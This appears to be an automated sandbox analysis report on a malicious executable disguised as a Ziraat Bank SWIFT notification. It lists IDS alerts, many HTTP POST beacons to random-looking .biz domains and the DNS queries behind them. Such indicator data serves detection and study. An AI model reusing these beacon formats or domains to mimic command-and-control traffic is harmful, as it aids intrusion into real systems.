Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49779

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bwejhhjeahxfje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic	HTTP traffic detected: POST /bspqodujb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /arkfkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /buysxojjpcbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uhxgrttve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /twetxppkkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xltkhwus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic	HTTP traffic detected: POST /srydcadgxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ldqqpocfqndx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kobojotdnctbldt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /llpwgsaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhgrkvedbhvggxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /okybrjufbtsub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pucgkwypphrledk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ttplobtxqmiksba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmikhaggcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /udiyekihhlktyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hqwogpkl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uppfulbfwwgcmugi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /skptrowoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /prrrrvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gtfcajvqmbnpqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vsgvgssokytrsgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /brcmn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbppubhsntef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qrwvpmlh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxrihtviqbtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sroelgby HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jrqya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sogowygirgwvide HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /akssysyiwejarq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhkjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cncvougpyxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ooabmbiqikucit HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rghyclqgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nolqdemmkybmoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /asw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /yhgrkvedbhvggxwh?usid=25&utid=9755608042 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /okybrjufbtsub?usid=25&utid=9755608117 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
